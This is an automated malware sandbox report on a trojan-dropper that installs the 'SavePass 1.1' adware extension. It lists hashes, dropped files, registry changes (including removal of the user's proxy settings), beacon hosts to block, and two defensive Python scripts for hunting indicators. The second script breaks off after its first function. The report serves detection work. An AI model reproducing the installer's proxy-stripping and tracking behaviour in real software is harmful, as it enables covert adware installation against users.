Detection names: Trojan-Dropper.Win32.Agent.peok (Kaspersky), Gen:Variant.Adware.Zusy.127996 (B) (Emsisoft), Gen:Variant.Adware.Zusy.127996 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: a0a59f72f2bbe495c7b4314a34f5b16c
SHA1: 8757838e8c142167819d54ce4f83796f136eb8c5
SHA256: a76002410292e9b7481b5a7d9465eadb66cda025a8d6c7fcb76e2636a61500b6
SSDeep: 6144:68yWGSreo5tSQDV2AOeJirGX0wLDcDqyvF0N6McKDm6WKR9Ula3:VtHSJFrGX0KDg0N6IDm6/R3
Size: 212384 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-02-01 20:46:10
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Dropper. A Trojan program intended for the stealthy installation of other malware onto the user's system. In this sample the installed component is the Crossrider-built "SavePass 1.1" browser extension installer described below (see the Software\Crossrider keys, the CrAppId/CrPublisherId values and the errors.crossrider.com beacons).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
Ywuovtbypk.exe:468
e33a47b.exe:324
%original file name%.exe:228
ping.exe:1948
ping.exe:596
ping.exe:1940
ping.exe:336
ping.exe:460
ping.exe:320
ping.exe:188
ping.exe:496
ping.exe:236
The nine ping.exe instances appear after e33a47b.exe writes %Documents and Settings%\%current user%\Local Settings\Temp\11995.bat; ping is the usual delay idiom in such batch files, although the report does not show the batch file's contents. Their only recorded registry activity (below) is the CryptoAPI RNG seed, which any process that uses CryptGenRandom updates; it is not an indicator.
The Trojan injects its code into the following process(es): no code injection into other processes was detected.
Mutexes
The following mutexes were created/opened: no objects were found.
File activity
The process Ywuovtbypk.exe:468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Tasks\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb4.tmp (659658 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\md5dll.dll (6 bytes)
%Program Files%\SavePass 1.1\UninstallBrw.exe (8281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\98225 (17420 bytes)
%Program Files%\SavePass 1.1\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.exe (7547 bytes)
%Program Files%\SavePass 1.1\Uninstall.exe (601 bytes)
%Program Files%\SavePass 1.1\utils.exe (80413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\251151 (76466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils.dll (28288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (4 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\98225 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\251151 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (0 bytes)
The process e33a47b.exe:324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0VYLS3U5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ugwubcfcj.tmp (400738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WDMRK3AB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_a (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_b (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_c (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_d (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_e (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11995.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ywuovtbypk.exe (5217358 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\FacebookIsGod.dll (2393 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ugwubcfcj.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\FacebookIsGod.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ywuovtbypk.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0VYLS3U5\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\StdUtils.dll (0 bytes)
The process %original file name%.exe:228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s): none are listed in the report for this process.
Registry activity
The process Ywuovtbypk.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"Publisher" = "OB"
"UninstallString" = "%Program Files%\SavePass 1.1\Uninstall.exe /fcp=1 /runexe='%Program Files%\SavePass 1.1\UninstallBrw.exe' /url='http://static.gonotiftime.com/notf_sys/index.html' /brwtype='uni' /onerrorexe='%Program Files%\SavePass 1.1\utils.exe' /crregname='SavePass 1.1' /appid='69829' /srcid='001504' /bic='C54C51C1259F4E0794ABE2EFF455B67AIE' /verifier='c86f1da5444bc59351fec9b57e5afa7b' /brwshtoms='15000' /installerversion='1_36_01_22' /statsdomain='http://stats.ourinputdatastorage.com/utility.gif?' /errorsdomain='http://errors.ourinputdatastorage.com/utility.gif?' /monetizationdomain='http://logs.ourinputdatastorage.com/monetization.gif?'"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"CrPublisherId" = "29777"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"DisplayName" = "SavePass 1.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Crossrider]
"Verifier" = "c86f1da5444bc59351fec9b57e5afa7b"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"DisplayIcon" = "%Program Files%\SavePass 1.1\utils.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Crossrider]
"Bic" = "C54C51C1259F4E0794ABE2EFF455B67AIE"
[HKLM\SOFTWARE\InstalledBrowserExtensions\29777]
"69829" = "SavePass 1.1"
[HKCU\Software\InstalledBrowserExtensions\OB]
"69829" = "SavePass 1.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Crossrider]
"Bic" = "C54C51C1259F4E0794ABE2EFF455B67AIE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 C9 AC DD 1B F6 C2 52 AD 8A FE 5D 1D 44 87 3F"
[HKLM\SOFTWARE\Crossrider]
"Verifier" = "c86f1da5444bc59351fec9b57e5afa7b"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"CrAppId" = "69829"
"DisplayVersion" = "1.36.01.22"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstalledBrowserExtensions\29777]
"69829" = "SavePass 1.1"
[HKCU\Software\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"
The Trojan sets the following IE Local intranet zone-map values. These are IE's default Local intranet settings; writing them, together with the cache paths and SavedLegacySettings above, is the usual side effect of a WinINet client initialising its settings rather than a deliberate zone downgrade:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1" (include all network paths (UNCs) in the Local intranet zone)
"ProxyBypass" = "1" (include all sites that bypass the proxy server in the Local intranet zone)
"IntranetName" = "1" (include all local sites not listed in other zones, i.e. dotless host names, in the Local intranet zone)
Proxy settings are disabled. With the AutoConfigURL, ProxyServer and ProxyOverride values deleted below, any proxy the user had configured is removed, so the installer's beacons go direct:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
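The UninstallString above is effectively the installer's campaign configuration: every /switch='value' pair names a host, a helper executable or a campaign identifier that also reappears in the network beacons (appid as app=, srcid as srcid=/c=, bic and verifier verbatim). The following is an added example, not code from the report or from the installer, that parses that string into hunting artefacts and flags an Uninstall subkey as Crossrider-built; the UNINSTALL_STRING constant is copied from the report, with its %Program Files% placeholder left as-is.

```python
import re
from typing import Dict
from urllib.parse import urlsplit

# Copied from the report's UninstallString; "%Program Files%" is the report's placeholder.
UNINSTALL_STRING = (
    "%Program Files%\\SavePass 1.1\\Uninstall.exe /fcp=1 "
    "/runexe='%Program Files%\\SavePass 1.1\\UninstallBrw.exe' "
    "/url='http://static.gonotiftime.com/notf_sys/index.html' /brwtype='uni' "
    "/onerrorexe='%Program Files%\\SavePass 1.1\\utils.exe' "
    "/crregname='SavePass 1.1' /appid='69829' /srcid='001504' "
    "/bic='C54C51C1259F4E0794ABE2EFF455B67AIE' "
    "/verifier='c86f1da5444bc59351fec9b57e5afa7b' /brwshtoms='15000' "
    "/installerversion='1_36_01_22' "
    "/statsdomain='http://stats.ourinputdatastorage.com/utility.gif?' "
    "/errorsdomain='http://errors.ourinputdatastorage.com/utility.gif?' "
    "/monetizationdomain='http://logs.ourinputdatastorage.com/monetization.gif?'"
)

# /name='quoted value' (may contain spaces) or /name=bare
SWITCH_RE = re.compile(r"/(\w+)=(?:'([^']*)'|(\S+))")

CAMPAIGN_IDS = ("appid", "srcid", "bic", "verifier", "installerversion")
URL_SWITCHES = ("url", "statsdomain", "errorsdomain", "monetizationdomain")
EXE_SWITCHES = ("runexe", "onerrorexe")


def parse_switches(cmdline: str) -> Dict[str, str]:
    """Split a /key=value command line into a dict (a repeated key keeps the last value)."""
    switches = {}
    for m in SWITCH_RE.finditer(cmdline):
        switches[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return switches


def campaign_profile(cmdline: str) -> Dict[str, object]:
    """Hunting artefacts from one UninstallString: hosts, helper executables, campaign IDs."""
    sw = parse_switches(cmdline)
    hosts = sorted({urlsplit(sw[k]).hostname for k in URL_SWITCHES if k in sw})
    exes = sorted(sw[k] for k in EXE_SWITCHES if k in sw)
    ids = {k: sw[k] for k in CAMPAIGN_IDS if k in sw}
    return {"hosts": hosts, "executables": exes, "identifiers": ids}


def is_crossrider_uninstall_entry(values: Dict[str, str]) -> bool:
    """values: value-name -> data of one Uninstall\\<app> subkey (e.g. from a .reg export).
    Matches on the Cr* values the installer writes, or on an UninstallString that
    carries the bic/verifier/srcid campaign switches."""
    if "CrAppId" in values or "CrPublisherId" in values:
        return True
    sw = parse_switches(values.get("UninstallString", ""))
    return {"bic", "verifier", "srcid"}.issubset(sw)


if __name__ == "__main__":
    profile = campaign_profile(UNINSTALL_STRING)
    for host in profile["hosts"]:
        print("host:", host)
    print("executables:", profile["executables"])
    print("identifiers:", profile["identifiers"])
```

Note that the stats/errors/monetization domains in the UninstallString (ourinputdatastorage.com) differ from the hosts the sandbox actually saw contacted (errors.crossrider.com and the S3 website endpoint), so both sets belong on a block list; the identifiers are the stable part across the two.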
The process e33a47b.exe:324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"11995.bat" = "11995"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\InstalledBrowserExtensions\29777]
"69829" = "SavePass v2.2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A E8 3D CB 24 78 19 E9 9B 7B 5C B4 29 E1 3F 9B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\InstalledBrowserExtensions\29777]
"69829" = "SavePass v2.2"
[HKCU\Software\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"
The Trojan sets the following IE Local intranet zone-map values (IE defaults, written as a side effect of WinINet initialisation):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1" (include all network paths (UNCs) in the Local intranet zone)
"ProxyBypass" = "1" (include all sites that bypass the proxy server in the Local intranet zone)
"IntranetName" = "1" (include all local sites not listed in other zones, i.e. dotless host names, in the Local intranet zone)
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E C3 29 8D 82 74 05 92 B8 30 E7 36 92 D9 B5 9B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"e33a47b.exe" = "e33a47b"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The Trojan sets the following IE Local intranet zone-map values (IE defaults, written as a side effect of WinINet initialisation):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1" (include all sites that bypass the proxy server in the Local intranet zone)
"UNCAsIntranet" = "1" (include all network paths (UNCs) in the Local intranet zone)
"IntranetName" = "1" (include all local sites not listed in other zones, i.e. dotless host names, in the Local intranet zone)
The process ping.exe:1948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 77 FD 17 B7 8D 44 DE 70 E1 F9 90 1A EF CD AA"
The process ping.exe:596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 E8 9C 56 85 AA C2 8B 90 C1 DE 0C CC 7B A9 DA"
The process ping.exe:1940 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 94 0E D9 68 6B E4 02 14 F9 CC 3F 87 6A A5 62"
The process ping.exe:336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C D7 54 5C 5E FF 86 86 D2 1D 20 33 81 0E 5D C7"
The process ping.exe:460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 BC 8C 76 44 E5 13 A7 81 C1 BF BA 58 4D 70 0C"
The process ping.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 4B 8E 9B A1 60 70 61 5F 21 60 18 24 8B 40 2A"
The process ping.exe:188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 61 04 DA 01 85 AE F8 B1 44 FF 55 ED E5 DA 77"
The process ping.exe:496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 27 B9 3B 09 2D 54 E8 B9 35 22 67 C4 A8 5C 6A"
The process ping.exe:236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 91 1F 9A B0 F3 C7 60 4B 1F F5 66 06 0B E7 35"
Dropped PE files
MD5 | File path |
---|---|
72d181e3089d6eee4c1f81c1b13ea88c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_a |
efc6d4bd8ac2e791549143ed7dc39d39 | c:\Program Files\SavePass 1.1\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.exe |
0374c8fec0166143ddad92c34878adf8 | c:\Program Files\SavePass 1.1\Uninstall.exe |
6860cb0759479d5b028812cf6a24f9d2 | c:\Program Files\SavePass 1.1\UninstallBrw.exe |
4b47189b70d27324629908716d40ac7d | c:\Program Files\SavePass 1.1\utils.exe |
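The table above, the Summary hashes and the file names in the File activity section are the host-side indicators for this sample. The following is an added example, not part of the report, of sweeping a directory tree for them: it streams MD5/SHA1/SHA256 of every file and matches on the report's MD5s, on the file names that are specific to this installer (the five-part setup[1].exe_a..e download, the 46d65092-...-5 scheduled task and its .exe, the FacebookIsGod.dll plug-in) and on anything inside a "SavePass 1.1" directory. The demo() tree is constructed here, contains no malware, and uses the content b"abc" solely because its MD5 is well known.

```python
import hashlib
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional, Set, Tuple

# Digests copied from the report's "Dropped PE files" table and Summary.
DROPPED_MD5: Dict[str, str] = {
    "72d181e3089d6eee4c1f81c1b13ea88c": "setup[1].exe_a",
    "efc6d4bd8ac2e791549143ed7dc39d39": "46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.exe",
    "0374c8fec0166143ddad92c34878adf8": "Uninstall.exe",
    "6860cb0759479d5b028812cf6a24f9d2": "UninstallBrw.exe",
    "4b47189b70d27324629908716d40ac7d": "utils.exe",
    "a0a59f72f2bbe495c7b4314a34f5b16c": "original dropper (Summary MD5)",
}
# Names that identify the installer regardless of content: the chunked
# download, the scheduled-task GUID and the oddly named NSIS plug-in.
NAME_PATTERNS = [
    re.compile(r"^setup\[1\]\.exe_[a-e]$", re.I),
    re.compile(r"^46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5\.(job|exe)$", re.I),
    re.compile(r"^FacebookIsGod\.dll$", re.I),
]
SAVEPASS_DIR = "savepass 1.1"


def file_digests(path: Path, chunk: int = 1 << 20) -> Dict[str, str]:
    """MD5/SHA1/SHA256 in one streaming pass, so large files are not read into memory."""
    hashes = {name: hashlib.new(name) for name in ("md5", "sha1", "sha256")}
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            for h in hashes.values():
                h.update(block)
    return {name: h.hexdigest() for name, h in hashes.items()}


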